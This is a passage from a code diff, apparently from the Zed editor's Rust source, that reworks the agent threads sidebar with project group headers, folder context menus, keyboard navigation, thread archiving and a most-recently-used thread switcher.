} + ) + }); + let show_new_thread_button = !has_new_thread_entry && !self.has_filter_query(cx); + + let workspace = self.workspace_for_group(path_list, cx); + + let path_list_for_toggle = path_list.clone(); + let path_list_for_collapse = path_list.clone(); + let view_more_expanded = self.expanded_groups.contains_key(path_list); + + let label = if highlight_positions.is_empty() { + Label::new(label.clone()) + .when(!is_active, |this| this.color(Color::Muted)) + .into_any_element() + } else { + HighlightedLabel::new(label.clone(), highlight_positions.to_vec()) + .when(!is_active, |this| this.color(Color::Muted)) + .into_any_element() + }; + + let color = cx.theme().colors(); + let hover_color = color + .element_active + .blend(color.element_background.opacity(0.2)); + + h_flex() + .id(id) + .group(&group_name) + .h(Tab::content_height(cx)) + .w_full() + .pl(px(5.)) + .pr_1p5() + .border_1() + .map(|this| { + if is_focused { + this.border_color(color.border_focused) + } else { + this.border_color(gpui::transparent_black()) + } + }) + .justify_between() + .child( + h_flex() + .when(!is_active, |this| this.cursor_pointer()) + .relative() + .min_w_0() + .w_full() + .gap(px(5.)) + .child( + IconButton::new(disclosure_id, disclosure_icon) + .shape(ui::IconButtonShape::Square) + .icon_size(IconSize::Small) + .icon_color(Color::Custom(cx.theme().colors().icon_muted.opacity(0.5))) + .tooltip(Tooltip::text(disclosure_tooltip)) + .on_click(cx.listener(move |this, _, window, cx| { + this.selection = None; + this.toggle_collapse(&path_list_for_toggle, window, cx); + })), + ) + .child(label) + .when_some( + self.render_remote_project_icon(ix, host.as_ref()), + |this, icon| this.child(icon), ) - .running(running) - .generation_done(has_notification) - .status(status) - .selected(selected) - .worktree(worktree_label.clone()) - .worktree_highlight_positions(positions.clone()) - .when(workspace_count > 1, |item| item.action_slot(remove_btn)) - .hovered(is_hovered) - 
.on_hover(cx.listener(move |picker, is_hovered, _window, cx| { - let mut changed = false; - if *is_hovered { - if picker.delegate.hovered_thread_item != Some(workspace_index) { - picker.delegate.hovered_thread_item = Some(workspace_index); - changed = true; + .when(is_collapsed, |this| { + this.when(has_running_threads, |this| { + this.child( + Icon::new(IconName::LoadCircle) + .size(IconSize::XSmall) + .color(Color::Muted) + .with_rotate_animation(2), + ) + }) + .when(waiting_thread_count > 0, |this| { + let tooltip_text = if waiting_thread_count == 1 { + "1 thread is waiting for confirmation".to_string() + } else { + format!( + "{waiting_thread_count} threads are waiting for confirmation", + ) + }; + this.child( + div() + .id(format!("{id_prefix}waiting-indicator-{ix}")) + .child( + Icon::new(IconName::Warning) + .size(IconSize::XSmall) + .color(Color::Warning), + ) + .tooltip(Tooltip::text(tooltip_text)), + ) + }) + }), + ) + .child( + h_flex() + .when(self.project_header_menu_ix != Some(ix), |this| { + this.visible_on_hover(group_name) + }) + .on_mouse_down(gpui::MouseButton::Left, |_, _, cx| { + cx.stop_propagation(); + }) + .child(self.render_project_header_menu(ix, id_prefix, key, cx)) + .when(view_more_expanded && !is_collapsed, |this| { + this.child( + IconButton::new( + SharedString::from(format!( + "{id_prefix}project-header-collapse-{ix}", + )), + IconName::ListCollapse, + ) + .icon_size(IconSize::Small) + .tooltip(Tooltip::text("Collapse Displayed Threads")) + .on_click(cx.listener({ + let path_list_for_collapse = path_list_for_collapse.clone(); + move |this, _, _window, cx| { + this.selection = None; + this.expanded_groups.remove(&path_list_for_collapse); + this.serialize(cx); + this.update_entries(cx); + } + })), + ) + }) + .when_some( + workspace.filter(|_| show_new_thread_button), + |this, workspace| { + let path_list = path_list.clone(); + this.child( + IconButton::new( + SharedString::from(format!( + "{id_prefix}project-header-new-thread-{ix}", + 
)), + IconName::Plus, + ) + .icon_size(IconSize::Small) + .tooltip(Tooltip::text("New Thread")) + .on_click(cx.listener( + move |this, _, window, cx| { + this.collapsed_groups.remove(&path_list); + this.selection = None; + this.create_new_thread(&workspace, window, cx); + }, + )), + ) + }, + ), + ) + .when(!is_active, |this| { + let path_list = path_list.clone(); + this.cursor_pointer() + .hover(|s| s.bg(hover_color)) + .tooltip(Tooltip::text("Open Workspace")) + .on_click(cx.listener(move |this, _, window, cx| { + if let Some(workspace) = this.workspace_for_group(&path_list, cx) { + this.active_entry = Some(ActiveEntry::Draft(workspace.clone())); + if let Some(multi_workspace) = this.multi_workspace.upgrade() { + multi_workspace.update(cx, |multi_workspace, cx| { + multi_workspace.activate(workspace.clone(), window, cx); + }); } - } else if picker.delegate.hovered_thread_item == Some(workspace_index) { - picker.delegate.hovered_thread_item = None; - changed = true; - } - if changed { - cx.notify(); + if AgentPanel::is_visible(&workspace, cx) { + workspace.update(cx, |workspace, cx| { + workspace.focus_panel::(window, cx); + }); + } + } else { + this.open_workspace_for_group(&path_list, window, cx); } })) - .when(!full_path.is_empty(), |this| { - this.tooltip(move |_, cx| { - Tooltip::with_meta(worktree_label.clone(), None, full_path.clone(), cx) + }) + .into_any_element() + } + + fn render_project_header_menu( + &self, + ix: usize, + id_prefix: &str, + project_group_key: &ProjectGroupKey, + cx: &mut Context, + ) -> impl IntoElement { + let multi_workspace = self.multi_workspace.clone(); + let this = cx.weak_entity(); + let project_group_key = project_group_key.clone(); + + PopoverMenu::new(format!("{id_prefix}project-header-menu-{ix}")) + .on_open(Rc::new({ + let this = this.clone(); + move |_window, cx| { + this.update(cx, |sidebar, cx| { + sidebar.project_header_menu_ix = Some(ix); + cx.notify(); + }) + .ok(); + } + })) + .menu(move |window, cx| { + let 
multi_workspace = multi_workspace.clone(); + let project_group_key = project_group_key.clone(); + + let menu = ContextMenu::build_persistent(window, cx, move |menu, _window, cx| { + let mut menu = menu + .header("Project Folders") + .end_slot_action(Box::new(menu::EndSlot)); + + for path in project_group_key.path_list().paths() { + let Some(name) = path.file_name() else { + continue; + }; + let name: SharedString = name.to_string_lossy().into_owned().into(); + let path = path.clone(); + let project_group_key = project_group_key.clone(); + let multi_workspace = multi_workspace.clone(); + menu = menu.entry_with_end_slot_on_hover( + name.clone(), + None, + |_, _| {}, + IconName::Close, + "Remove Folder".into(), + move |_window, cx| { + multi_workspace + .update(cx, |multi_workspace, cx| { + multi_workspace.remove_folder_from_project_group( + &project_group_key, + &path, + cx, + ); + }) + .ok(); + }, + ); + } + + let menu = menu.separator().entry( + "Add Folder to Project", + Some(Box::new(AddFolderToProject)), + { + let project_group_key = project_group_key.clone(); + let multi_workspace = multi_workspace.clone(); + move |window, cx| { + multi_workspace + .update(cx, |multi_workspace, cx| { + multi_workspace.prompt_to_add_folders_to_project_group( + &project_group_key, + window, + cx, + ); + }) + .ok(); + } + }, + ); + + let group_count = multi_workspace + .upgrade() + .map_or(0, |mw| mw.read(cx).project_group_keys().count()); + let menu = if group_count > 1 { + let project_group_key = project_group_key.clone(); + let multi_workspace = multi_workspace.clone(); + menu.entry( + "Move to New Window", + Some(Box::new( + zed_actions::agents_sidebar::MoveWorkspaceToNewWindow, + )), + move |window, cx| { + multi_workspace + .update(cx, |multi_workspace, cx| { + multi_workspace.move_project_group_to_new_window( + &project_group_key, + window, + cx, + ); + }) + .ok(); + }, + ) + } else { + menu + }; + + let project_group_key = project_group_key.clone(); + let multi_workspace = 
multi_workspace.clone(); + menu.separator() + .entry("Remove Project", None, move |window, cx| { + multi_workspace + .update(cx, |multi_workspace, cx| { + multi_workspace.remove_project_group( + &project_group_key, + window, + cx, + ); + }) + .ok(); + }) + }); + + let this = this.clone(); + window + .subscribe(&menu, cx, move |_, _: &gpui::DismissEvent, _window, cx| { + this.update(cx, |sidebar, cx| { + sidebar.project_header_menu_ix = None; + cx.notify(); }) + .ok(); }) - .into_any_element(), + .detach(); + + Some(menu) + }) + .trigger( + IconButton::new( + SharedString::from(format!("{id_prefix}-ellipsis-menu-{ix}")), + IconName::Ellipsis, ) - } - SidebarEntry::RecentProject(project_entry) => { - let name = project_entry.name.clone(); - let full_path = project_entry.full_path.clone(); - let item_id: SharedString = - format!("recent-project-{:?}", project_entry.workspace_id).into(); - - Some( - ThreadItem::new(item_id, name.clone()) - .icon(IconName::Folder) - .selected(selected) - .highlight_positions(positions.clone()) - .tooltip(move |_, cx| { - Tooltip::with_meta(name.clone(), None, full_path.clone(), cx) - }) - .into_any_element(), + .selected_style(ButtonStyle::Tinted(TintColor::Accent)) + .icon_size(IconSize::Small), + ) + .anchor(gpui::Corner::TopRight) + .offset(gpui::Point { + x: px(0.), + y: px(1.), + }) + } + + fn render_sticky_header( + &self, + window: &mut Window, + cx: &mut Context, + ) -> Option { + let scroll_top = self.list_state.logical_scroll_top(); + + let &header_idx = self + .contents + .project_header_indices + .iter() + .rev() + .find(|&&idx| idx <= scroll_top.item_ix)?; + + let needs_sticky = header_idx < scroll_top.item_ix + || (header_idx == scroll_top.item_ix && scroll_top.offset_in_item > px(0.)); + + if !needs_sticky { + return None; + } + + let ListEntry::ProjectHeader { + key, + label, + highlight_positions, + has_running_threads, + waiting_thread_count, + is_active, + } = self.contents.entries.get(header_idx)? 
+ else { + return None; + }; + + let is_focused = self.focus_handle.is_focused(window); + let is_selected = is_focused && self.selection == Some(header_idx); + + let header_element = self.render_project_header( + header_idx, + true, + key, + &label, + &highlight_positions, + *has_running_threads, + *waiting_thread_count, + *is_active, + is_selected, + cx, + ); + + let top_offset = self + .contents + .project_header_indices + .iter() + .find(|&&idx| idx > header_idx) + .and_then(|&next_idx| { + let bounds = self.list_state.bounds_for_item(next_idx)?; + let viewport = self.list_state.viewport_bounds(); + let y_in_viewport = bounds.origin.y - viewport.origin.y; + let header_height = bounds.size.height; + (y_in_viewport < header_height).then_some(y_in_viewport - header_height) + }) + .unwrap_or(px(0.)); + + let color = cx.theme().colors(); + let background = color + .title_bar_background + .blend(color.panel_background.opacity(0.2)); + + let element = v_flex() + .absolute() + .top(top_offset) + .left_0() + .w_full() + .bg(background) + .border_b_1() + .border_color(color.border.opacity(0.5)) + .child(header_element) + .shadow_xs() + .into_any_element(); + + Some(element) + } + + fn toggle_collapse( + &mut self, + path_list: &PathList, + _window: &mut Window, + cx: &mut Context, + ) { + if self.collapsed_groups.contains(path_list) { + self.collapsed_groups.remove(path_list); + } else { + self.collapsed_groups.insert(path_list.clone()); + } + self.serialize(cx); + self.update_entries(cx); + } + + fn dispatch_context(&self, window: &Window, cx: &Context) -> KeyContext { + let mut dispatch_context = KeyContext::new_with_defaults(); + dispatch_context.add("ThreadsSidebar"); + dispatch_context.add("menu"); + + let is_archived_search_focused = matches!(&self.view, SidebarView::Archive(archive) if archive.read(cx).is_filter_editor_focused(window, cx)); + + let identifier = if self.filter_editor.focus_handle(cx).is_focused(window) + || is_archived_search_focused + { + 
"searching" + } else { + "not_searching" + }; + + dispatch_context.add(identifier); + dispatch_context + } + + fn focus_in(&mut self, window: &mut Window, cx: &mut Context) { + if !self.focus_handle.is_focused(window) { + return; + } + + if let SidebarView::Archive(archive) = &self.view { + let has_selection = archive.read(cx).has_selection(); + if !has_selection { + archive.update(cx, |view, cx| view.focus_filter_editor(window, cx)); + } + } else if self.selection.is_none() { + self.filter_editor.focus_handle(cx).focus(window, cx); + } + } + + fn cancel(&mut self, _: &Cancel, window: &mut Window, cx: &mut Context) { + if self.reset_filter_editor_text(window, cx) { + self.update_entries(cx); + } else { + self.selection = None; + self.filter_editor.focus_handle(cx).focus(window, cx); + cx.notify(); + } + } + + fn focus_sidebar_filter( + &mut self, + _: &FocusSidebarFilter, + window: &mut Window, + cx: &mut Context, + ) { + self.selection = None; + if let SidebarView::Archive(archive) = &self.view { + archive.update(cx, |view, cx| { + view.clear_selection(); + view.focus_filter_editor(window, cx); + }); + } else { + self.filter_editor.focus_handle(cx).focus(window, cx); + } + + // When vim mode is active, the editor defaults to normal mode which + // blocks text input. Switch to insert mode so the user can type + // immediately. 
+ if vim_mode_setting::VimModeSetting::get_global(cx).0 { + if let Ok(action) = cx.build_action("vim::SwitchToInsertMode", None) { + window.dispatch_action(action, cx); + } + } + + cx.notify(); + } + + fn reset_filter_editor_text(&mut self, window: &mut Window, cx: &mut Context) -> bool { + self.filter_editor.update(cx, |editor, cx| { + if editor.buffer().read(cx).len(cx).0 > 0 { + editor.set_text("", window, cx); + true + } else { + false + } + }) + } + + fn has_filter_query(&self, cx: &App) -> bool { + !self.filter_editor.read(cx).text(cx).is_empty() + } + + fn editor_move_down(&mut self, _: &MoveDown, window: &mut Window, cx: &mut Context) { + self.select_next(&SelectNext, window, cx); + if self.selection.is_some() { + self.focus_handle.focus(window, cx); + } + } + + fn editor_move_up(&mut self, _: &MoveUp, window: &mut Window, cx: &mut Context) { + self.select_previous(&SelectPrevious, window, cx); + if self.selection.is_some() { + self.focus_handle.focus(window, cx); + } + } + + fn editor_confirm(&mut self, window: &mut Window, cx: &mut Context) { + if self.selection.is_none() { + self.select_next(&SelectNext, window, cx); + } + if self.selection.is_some() { + self.focus_handle.focus(window, cx); + } + } + + fn select_next(&mut self, _: &SelectNext, _window: &mut Window, cx: &mut Context) { + let next = match self.selection { + Some(ix) if ix + 1 < self.contents.entries.len() => ix + 1, + Some(_) if !self.contents.entries.is_empty() => 0, + None if !self.contents.entries.is_empty() => 0, + _ => return, + }; + self.selection = Some(next); + self.list_state.scroll_to_reveal_item(next); + cx.notify(); + } + + fn select_previous(&mut self, _: &SelectPrevious, window: &mut Window, cx: &mut Context) { + match self.selection { + Some(0) => { + self.selection = None; + self.filter_editor.focus_handle(cx).focus(window, cx); + cx.notify(); + } + Some(ix) => { + self.selection = Some(ix - 1); + self.list_state.scroll_to_reveal_item(ix - 1); + cx.notify(); + } + None if 
!self.contents.entries.is_empty() => { + let last = self.contents.entries.len() - 1; + self.selection = Some(last); + self.list_state.scroll_to_reveal_item(last); + cx.notify(); + } + None => {} + } + } + + fn select_first(&mut self, _: &SelectFirst, _window: &mut Window, cx: &mut Context) { + if !self.contents.entries.is_empty() { + self.selection = Some(0); + self.list_state.scroll_to_reveal_item(0); + cx.notify(); + } + } + + fn select_last(&mut self, _: &SelectLast, _window: &mut Window, cx: &mut Context) { + if let Some(last) = self.contents.entries.len().checked_sub(1) { + self.selection = Some(last); + self.list_state.scroll_to_reveal_item(last); + cx.notify(); + } + } + + fn confirm(&mut self, _: &Confirm, window: &mut Window, cx: &mut Context) { + let Some(ix) = self.selection else { return }; + let Some(entry) = self.contents.entries.get(ix) else { + return; + }; + + match entry { + ListEntry::ProjectHeader { key, .. } => { + let path_list = key.path_list().clone(); + self.toggle_collapse(&path_list, window, cx); + } + ListEntry::Thread(thread) => { + let metadata = thread.metadata.clone(); + match &thread.workspace { + ThreadEntryWorkspace::Open(workspace) => { + let workspace = workspace.clone(); + self.activate_thread(metadata, &workspace, window, cx); + } + ThreadEntryWorkspace::Closed(path_list) => { + self.open_workspace_and_activate_thread( + metadata, + path_list.clone(), + window, + cx, + ); + } + } + } + ListEntry::ViewMore { + key, + is_fully_expanded, + .. + } => { + let path_list = key.path_list().clone(); + if *is_fully_expanded { + self.expanded_groups.remove(&path_list); + } else { + let current = self.expanded_groups.get(&path_list).copied().unwrap_or(0); + self.expanded_groups.insert(path_list, current + 1); + } + self.serialize(cx); + self.update_entries(cx); + } + ListEntry::DraftThread { .. } => { + // Already active — nothing to do. + } + ListEntry::NewThread { key, .. 
} => { + let path_list = key.path_list().clone(); + if let Some(workspace) = self.workspace_for_group(&path_list, cx) { + self.create_new_thread(&workspace, window, cx); + } else { + self.open_workspace_for_group(&path_list, window, cx); + } + } + } + } + + fn find_workspace_across_windows( + &self, + cx: &App, + predicate: impl Fn(&Entity, &App) -> bool, + ) -> Option<(WindowHandle, Entity)> { + cx.windows() + .into_iter() + .filter_map(|window| window.downcast::()) + .find_map(|window| { + let workspace = window.read(cx).ok().and_then(|multi_workspace| { + multi_workspace + .workspaces() + .find(|workspace| predicate(workspace, cx)) + .cloned() + })?; + Some((window, workspace)) + }) + } + + fn find_workspace_in_current_window( + &self, + cx: &App, + predicate: impl Fn(&Entity, &App) -> bool, + ) -> Option> { + self.multi_workspace.upgrade().and_then(|multi_workspace| { + multi_workspace + .read(cx) + .workspaces() + .find(|workspace| predicate(workspace, cx)) + .cloned() + }) + } + + fn load_agent_thread_in_workspace( + workspace: &Entity, + metadata: &ThreadMetadata, + focus: bool, + window: &mut Window, + cx: &mut App, + ) { + workspace.update(cx, |workspace, cx| { + workspace.reveal_panel::(window, cx); + }); + + if let Some(agent_panel) = workspace.read(cx).panel::(cx) { + agent_panel.update(cx, |panel, cx| { + panel.load_agent_thread( + Agent::from(metadata.agent_id.clone()), + metadata.session_id.clone(), + Some(metadata.folder_paths.clone()), + Some(metadata.title.clone()), + focus, + window, + cx, + ); + }); + } + } + + fn activate_thread_locally( + &mut self, + metadata: &ThreadMetadata, + workspace: &Entity, + window: &mut Window, + cx: &mut Context, + ) { + let Some(multi_workspace) = self.multi_workspace.upgrade() else { + return; + }; + + // Set active_entry eagerly so the sidebar highlight updates + // immediately, rather than waiting for a deferred AgentPanel + // event which can race with ActiveWorkspaceChanged clearing it. 
+ self.active_entry = Some(ActiveEntry::Thread { + session_id: metadata.session_id.clone(), + workspace: workspace.clone(), + }); + self.record_thread_access(&metadata.session_id); + + multi_workspace.update(cx, |multi_workspace, cx| { + multi_workspace.activate(workspace.clone(), window, cx); + }); + + Self::load_agent_thread_in_workspace(workspace, metadata, true, window, cx); + + self.update_entries(cx); + } + + fn activate_thread_in_other_window( + &self, + metadata: ThreadMetadata, + workspace: Entity, + target_window: WindowHandle, + cx: &mut Context, + ) { + let target_session_id = metadata.session_id.clone(); + let workspace_for_entry = workspace.clone(); + + let activated = target_window + .update(cx, |multi_workspace, window, cx| { + window.activate_window(); + multi_workspace.activate(workspace.clone(), window, cx); + Self::load_agent_thread_in_workspace(&workspace, &metadata, true, window, cx); + }) + .log_err() + .is_some(); + + if activated { + if let Some(target_sidebar) = target_window + .read(cx) + .ok() + .and_then(|multi_workspace| { + multi_workspace.sidebar().map(|sidebar| sidebar.to_any()) + }) + .and_then(|sidebar| sidebar.downcast::().ok()) + { + target_sidebar.update(cx, |sidebar, cx| { + sidebar.active_entry = Some(ActiveEntry::Thread { + session_id: target_session_id.clone(), + workspace: workspace_for_entry.clone(), + }); + sidebar.record_thread_access(&target_session_id); + sidebar.update_entries(cx); + }); + } + } + } + + fn activate_thread( + &mut self, + metadata: ThreadMetadata, + workspace: &Entity, + window: &mut Window, + cx: &mut Context, + ) { + if self + .find_workspace_in_current_window(cx, |candidate, _| candidate == workspace) + .is_some() + { + self.activate_thread_locally(&metadata, &workspace, window, cx); + return; + } + + let Some((target_window, workspace)) = + self.find_workspace_across_windows(cx, |candidate, _| candidate == workspace) + else { + return; + }; + + self.activate_thread_in_other_window(metadata, 
workspace, target_window, cx); + } + + fn open_workspace_and_activate_thread( + &mut self, + metadata: ThreadMetadata, + path_list: PathList, + window: &mut Window, + cx: &mut Context, + ) { + let Some(multi_workspace) = self.multi_workspace.upgrade() else { + return; + }; + + let open_task = multi_workspace.update(cx, |this, cx| { + this.find_or_create_local_workspace(path_list, window, cx) + }); + + cx.spawn_in(window, async move |this, cx| { + let workspace = open_task.await?; + this.update_in(cx, |this, window, cx| { + this.activate_thread(metadata, &workspace, window, cx); + })?; + anyhow::Ok(()) + }) + .detach_and_log_err(cx); + } + + fn find_current_workspace_for_path_list( + &self, + path_list: &PathList, + cx: &App, + ) -> Option> { + self.find_workspace_in_current_window(cx, |workspace, cx| { + workspace_path_list(workspace, cx).paths() == path_list.paths() + }) + } + + fn find_open_workspace_for_path_list( + &self, + path_list: &PathList, + cx: &App, + ) -> Option<(WindowHandle, Entity)> { + self.find_workspace_across_windows(cx, |workspace, cx| { + workspace_path_list(workspace, cx).paths() == path_list.paths() + }) + } + + fn activate_archived_thread( + &mut self, + metadata: ThreadMetadata, + window: &mut Window, + cx: &mut Context, + ) { + ThreadMetadataStore::global(cx) + .update(cx, |store, cx| store.unarchive(&metadata.session_id, cx)); + + if !metadata.folder_paths.paths().is_empty() { + let path_list = metadata.folder_paths.clone(); + if let Some(workspace) = self.find_current_workspace_for_path_list(&path_list, cx) { + self.activate_thread_locally(&metadata, &workspace, window, cx); + } else if let Some((target_window, workspace)) = + self.find_open_workspace_for_path_list(&path_list, cx) + { + self.activate_thread_in_other_window(metadata, workspace, target_window, cx); + } else { + self.open_workspace_and_activate_thread(metadata, path_list, window, cx); + } + return; + } + + let active_workspace = self + .multi_workspace + .upgrade() + 
.map(|w| w.read(cx).workspace().clone()); + + if let Some(workspace) = active_workspace { + self.activate_thread_locally(&metadata, &workspace, window, cx); + } + } + + fn expand_selected_entry( + &mut self, + _: &SelectChild, + _window: &mut Window, + cx: &mut Context, + ) { + let Some(ix) = self.selection else { return }; + + match self.contents.entries.get(ix) { + Some(ListEntry::ProjectHeader { key, .. }) => { + if self.collapsed_groups.contains(key.path_list()) { + let path_list = key.path_list().clone(); + self.collapsed_groups.remove(&path_list); + self.update_entries(cx); + } else if ix + 1 < self.contents.entries.len() { + self.selection = Some(ix + 1); + self.list_state.scroll_to_reveal_item(ix + 1); + cx.notify(); + } + } + _ => {} + } + } + + fn collapse_selected_entry( + &mut self, + _: &SelectParent, + _window: &mut Window, + cx: &mut Context, + ) { + let Some(ix) = self.selection else { return }; + + match self.contents.entries.get(ix) { + Some(ListEntry::ProjectHeader { key, .. }) => { + if !self.collapsed_groups.contains(key.path_list()) { + self.collapsed_groups.insert(key.path_list().clone()); + self.update_entries(cx); + } + } + Some( + ListEntry::Thread(_) + | ListEntry::ViewMore { .. } + | ListEntry::NewThread { .. } + | ListEntry::DraftThread { .. }, + ) => { + for i in (0..ix).rev() { + if let Some(ListEntry::ProjectHeader { key, .. }) = self.contents.entries.get(i) + { + self.selection = Some(i); + self.collapsed_groups.insert(key.path_list().clone()); + self.update_entries(cx); + break; + } + } + } + None => {} + } + } + + fn toggle_selected_fold( + &mut self, + _: &editor::actions::ToggleFold, + _window: &mut Window, + cx: &mut Context, + ) { + let Some(ix) = self.selection else { return }; + + // Find the group header for the current selection. + let header_ix = match self.contents.entries.get(ix) { + Some(ListEntry::ProjectHeader { .. }) => Some(ix), + Some( + ListEntry::Thread(_) + | ListEntry::ViewMore { .. 
} + | ListEntry::NewThread { .. } + | ListEntry::DraftThread { .. }, + ) => (0..ix).rev().find(|&i| { + matches!( + self.contents.entries.get(i), + Some(ListEntry::ProjectHeader { .. }) + ) + }), + None => None, + }; + + if let Some(header_ix) = header_ix { + if let Some(ListEntry::ProjectHeader { key, .. }) = self.contents.entries.get(header_ix) + { + let path_list = key.path_list(); + if self.collapsed_groups.contains(path_list) { + self.collapsed_groups.remove(path_list); + } else { + self.selection = Some(header_ix); + self.collapsed_groups.insert(path_list.clone()); + } + self.update_entries(cx); + } + } + } + + fn fold_all( + &mut self, + _: &editor::actions::FoldAll, + _window: &mut Window, + cx: &mut Context, + ) { + for entry in &self.contents.entries { + if let ListEntry::ProjectHeader { key, .. } = entry { + self.collapsed_groups.insert(key.path_list().clone()); + } + } + self.update_entries(cx); + } + + fn unfold_all( + &mut self, + _: &editor::actions::UnfoldAll, + _window: &mut Window, + cx: &mut Context, + ) { + self.collapsed_groups.clear(); + self.update_entries(cx); + } + + fn stop_thread(&mut self, session_id: &acp::SessionId, cx: &mut Context) { + let Some(multi_workspace) = self.multi_workspace.upgrade() else { + return; + }; + + let workspaces: Vec<_> = multi_workspace.read(cx).workspaces().cloned().collect(); + for workspace in workspaces { + if let Some(agent_panel) = workspace.read(cx).panel::(cx) { + let cancelled = + agent_panel.update(cx, |panel, cx| panel.cancel_thread(session_id, cx)); + if cancelled { + return; + } + } + } + } + + fn archive_thread( + &mut self, + session_id: &acp::SessionId, + window: &mut Window, + cx: &mut Context, + ) { + ThreadMetadataStore::global(cx).update(cx, |store, cx| store.archive(session_id, cx)); + + // If we're archiving the currently focused thread, move focus to the + // nearest thread within the same project group. 
We never cross group + // boundaries — if the group has no other threads, clear focus and open + // a blank new thread in the panel instead. + if self + .active_entry + .as_ref() + .is_some_and(|e| e.is_active_thread(session_id)) + { + let current_pos = self.contents.entries.iter().position(|entry| { + matches!(entry, ListEntry::Thread(t) if &t.metadata.session_id == session_id) + }); + + // Find the workspace that owns this thread's project group by + // walking backwards to the nearest ProjectHeader and looking up + // an open workspace for that group's path_list. + let group_workspace = current_pos.and_then(|pos| { + let path_list = + self.contents.entries[..pos] + .iter() + .rev() + .find_map(|e| match e { + ListEntry::ProjectHeader { key, .. } => Some(key.path_list()), + _ => None, + })?; + self.workspace_for_group(path_list, cx) + }); + + let next_thread = current_pos.and_then(|pos| { + let group_start = self.contents.entries[..pos] + .iter() + .rposition(|e| matches!(e, ListEntry::ProjectHeader { .. })) + .map_or(0, |i| i + 1); + let group_end = self.contents.entries[pos + 1..] + .iter() + .position(|e| matches!(e, ListEntry::ProjectHeader { .. })) + .map_or(self.contents.entries.len(), |i| pos + 1 + i); + + let above = self.contents.entries[group_start..pos] + .iter() + .rev() + .find_map(|entry| { + if let ListEntry::Thread(t) = entry { + Some(t) + } else { + None + } + }); + + above.or_else(|| { + self.contents.entries[pos + 1..group_end] + .iter() + .find_map(|entry| { + if let ListEntry::Thread(t) = entry { + Some(t) + } else { + None + } + }) + }) + }); + + if let Some(next) = next_thread { + let next_metadata = next.metadata.clone(); + // Use the thread's own workspace when it has one open (e.g. an absorbed + // linked worktree thread that appears under the main workspace's header + // but belongs to its own workspace). 
Loading into the wrong panel binds + // the thread to the wrong project, which corrupts its stored folder_paths + // when metadata is saved via ThreadMetadata::from_thread. + let target_workspace = match &next.workspace { + ThreadEntryWorkspace::Open(ws) => Some(ws.clone()), + ThreadEntryWorkspace::Closed(_) => group_workspace, + }; + if let Some(ref ws) = target_workspace { + self.active_entry = Some(ActiveEntry::Thread { + session_id: next_metadata.session_id.clone(), + workspace: ws.clone(), + }); + } + self.record_thread_access(&next_metadata.session_id); + + if let Some(workspace) = target_workspace { + if let Some(agent_panel) = workspace.read(cx).panel::(cx) { + agent_panel.update(cx, |panel, cx| { + panel.load_agent_thread( + Agent::from(next_metadata.agent_id.clone()), + next_metadata.session_id.clone(), + Some(next_metadata.folder_paths.clone()), + Some(next_metadata.title.clone()), + true, + window, + cx, + ); + }); + } + } + } else { + if let Some(workspace) = &group_workspace { + self.active_entry = Some(ActiveEntry::Draft(workspace.clone())); + if let Some(agent_panel) = workspace.read(cx).panel::(cx) { + agent_panel.update(cx, |panel, cx| { + panel.new_thread(&NewThread, window, cx); + }); + } + } + } + } + } + + fn remove_selected_thread( + &mut self, + _: &RemoveSelectedThread, + window: &mut Window, + cx: &mut Context, + ) { + let Some(ix) = self.selection else { + return; + }; + let Some(ListEntry::Thread(thread)) = self.contents.entries.get(ix) else { + return; + }; + match thread.status { + AgentThreadStatus::Running | AgentThreadStatus::WaitingForConfirmation => return, + AgentThreadStatus::Completed | AgentThreadStatus::Error => {} + } + + let session_id = thread.metadata.session_id.clone(); + self.archive_thread(&session_id, window, cx) + } + + fn record_thread_access(&mut self, session_id: &acp::SessionId) { + self.thread_last_accessed + .insert(session_id.clone(), Utc::now()); + } + + fn record_thread_message_sent(&mut self, session_id: 
&acp::SessionId) { + self.thread_last_message_sent_or_queued + .insert(session_id.clone(), Utc::now()); + } + + fn mru_threads_for_switcher(&self, cx: &App) -> Vec { + let mut current_header_label: Option = None; + let mut current_header_path_list: Option = None; + let mut entries: Vec = self + .contents + .entries + .iter() + .filter_map(|entry| match entry { + ListEntry::ProjectHeader { label, key, .. } => { + current_header_label = Some(label.clone()); + current_header_path_list = Some(key.path_list().clone()); + None + } + ListEntry::Thread(thread) => { + let workspace = match &thread.workspace { + ThreadEntryWorkspace::Open(workspace) => Some(workspace.clone()), + ThreadEntryWorkspace::Closed(_) => current_header_path_list + .as_ref() + .and_then(|pl| self.workspace_for_group(pl, cx)), + }?; + let notified = self + .contents + .is_thread_notified(&thread.metadata.session_id); + let timestamp: SharedString = format_history_entry_timestamp( + self.thread_last_message_sent_or_queued + .get(&thread.metadata.session_id) + .copied() + .or(thread.metadata.created_at) + .unwrap_or(thread.metadata.updated_at), + ) + .into(); + Some(ThreadSwitcherEntry { + session_id: thread.metadata.session_id.clone(), + title: thread.metadata.title.clone(), + icon: thread.icon, + icon_from_external_svg: thread.icon_from_external_svg.clone(), + status: thread.status, + metadata: thread.metadata.clone(), + workspace, + project_name: current_header_label.clone(), + worktrees: thread + .worktrees + .iter() + .map(|wt| ThreadItemWorktreeInfo { + name: wt.name.clone(), + full_path: wt.full_path.clone(), + highlight_positions: Vec::new(), + }) + .collect(), + diff_stats: thread.diff_stats, + is_title_generating: thread.is_title_generating, + notified, + timestamp, + }) + } + _ => None, + }) + .collect(); + + entries.sort_by(|a, b| { + let a_accessed = self.thread_last_accessed.get(&a.session_id); + let b_accessed = self.thread_last_accessed.get(&b.session_id); + + match (a_accessed, 
b_accessed) { + (Some(a_time), Some(b_time)) => b_time.cmp(a_time), + (Some(_), None) => std::cmp::Ordering::Less, + (None, Some(_)) => std::cmp::Ordering::Greater, + (None, None) => { + let a_sent = self.thread_last_message_sent_or_queued.get(&a.session_id); + let b_sent = self.thread_last_message_sent_or_queued.get(&b.session_id); + + match (a_sent, b_sent) { + (Some(a_time), Some(b_time)) => b_time.cmp(a_time), + (Some(_), None) => std::cmp::Ordering::Less, + (None, Some(_)) => std::cmp::Ordering::Greater, + (None, None) => { + let a_time = a.metadata.created_at.or(Some(a.metadata.updated_at)); + let b_time = b.metadata.created_at.or(Some(b.metadata.updated_at)); + b_time.cmp(&a_time) + } + } + } + } + }); + + entries + } + + fn dismiss_thread_switcher(&mut self, cx: &mut Context) { + self.thread_switcher = None; + self._thread_switcher_subscriptions.clear(); + if let Some(mw) = self.multi_workspace.upgrade() { + mw.update(cx, |mw, cx| { + mw.set_sidebar_overlay(None, cx); + }); + } + } + + fn on_toggle_thread_switcher( + &mut self, + action: &ToggleThreadSwitcher, + window: &mut Window, + cx: &mut Context, + ) { + 